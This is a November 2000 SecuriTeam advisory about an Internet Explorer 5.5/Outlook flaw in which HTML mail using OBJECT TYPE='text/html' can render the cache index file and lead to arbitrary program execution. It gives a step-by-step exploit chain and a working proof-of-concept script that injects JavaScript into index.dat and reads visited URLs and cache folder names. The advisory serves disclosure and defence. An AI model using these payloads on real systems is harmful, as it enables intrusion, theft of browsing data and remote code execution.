Subject: [NT] OBJECT TYPE="text/html" vulnerability in IE 5.5 allows arbitrary command execution
Date: Sun, 26 Nov 2000 19:34:57 +0100


The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  OBJECT TYPE="text/html" vulnerability in IE 5.5 allows arbitrary command
execution
------------------------------------------------------------------------

SUMMARY

There is a security vulnerability in IE 5.5 and Outlook that enables
malicious attackers to execute arbitrarily programs by sending an e-mail
containing the tag OBJECT TYPE="text/html". This security hole also
enables remote users to parse the index.dat file by revealing the location
of temporary Internet files folder. This may lead to taking full control
over user's computer.

Note: This is completely different issue from the advisory
<http://www.securiteam.com/windowsntfocus/IE_vulnerability_allows_execution_of_arbitrary_programs___chm_files_and_temporary_file_folder_.html> "IE 5.x/Outlook allows executing arbitrary programs using .chm files and temporary internet files folder" though both share some common properties.

DETAILS

Vulnerable systems:
IE 5.5 probably 5.x and Outlook/Outlook Express

Background:
If one can inject a file to the user's local disk and know its exact
location, it is possible to execute arbitrary programs in at least two
ways:
1) Using the window.showHelp() function (example:
window.showHelp("c:\\dir\\hostile.chm"))
2) Using an <OBJECT> tag (for example: <OBJECT
CLASSID="clsid:000000000-0000-0000-00000-000000000002"
CODEBASE="C:\DIR\HOSTILE.EXE">)

Therefore, the only question that arises is how to inject a specified file
on user's disk. One good way is to use the Temporary Internet Files Folder
that contains cached documents and files. The only problem with this is
that there are several subfolders with random names. There is, however, a
special file called "index.dat" which is something like a catalog or
registry that contains all visited URLs as well as more useful
information: the names of the random folders (in the beginning of each
filename).

A possible exploit scenario:
1) Inject JavaScript to index.dat by:
window.open("http://example.com/index.html?<SCRIPT>JSCODE</SCRIPT>"). The
JavaScript is executed in index.dat and has access to its content, which
allows us to find the random directory names

2) Parse / render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary
Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
HEIGHT=200></OBJECT>

3) After the Temporary Internet Files Folders are known inject for example
chm files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>

4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");

The presence of the random temporary Internet Files folders in index.dat
is very dangerous - it means that every Cross Frame Security vulnerability
or vulnerability that reads local files may lead to executing arbitrary
programs.

Exploit:
--------parsedat.html------------------------------------------------
This demo is for Windows 9x - you must modify the source for Win2K. You
may need to wait a few minutes if you have slow computer. If you have
Pentium 500 or better or use Win2K probably much less. It is expected a
window with location "about:blank" to be opened containing index.dat - the
file where the random names of temporary internet files directories are
kept (they are random names in the beginning of the window) and the list
of all visited URLs among other stuff. Once the temporary internet files
directories are know it is possible to execute arbitrary programs thru
cached files and showHelp() or OBJECT CODEBASE="...". If you don't see a
window with location "about:blank" and content of index.dat close IE and
visit the page again.

<SCRIPT>
b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>");
s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet
Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200
HEIGHT=200></OBJECT>';
file://s='<OBJECT DATA="file://C:/Documents and
Settings/Administrator/Local
Settings/Temporary Internet Files/Content.IE5/index.dat"
TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>';
// ^^^ This is for Win2K ------------you must change "Administrator" to
the actual user name
setTimeout("document.writeln(s)",5000);
</SCRIPT>
---------------------------------------------------------------------

Workaround:
Disable Active Scripting and move the location of the Temporary Internet
Files Folder to an unpredicatable location.

Demonstration:
The following demonstration opens index.dat that contains the Temporary
Internet Files Folders and the list of all visited URLs:
 <http://www.guninski.com/parsedat.html>
http://www.guninski.com/parsedat.html

ADDITIONAL INFORMATION

The information has been provided by  <mailto:guninski@GUNINSKI.COM>
Georgi Guninski.

========================================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.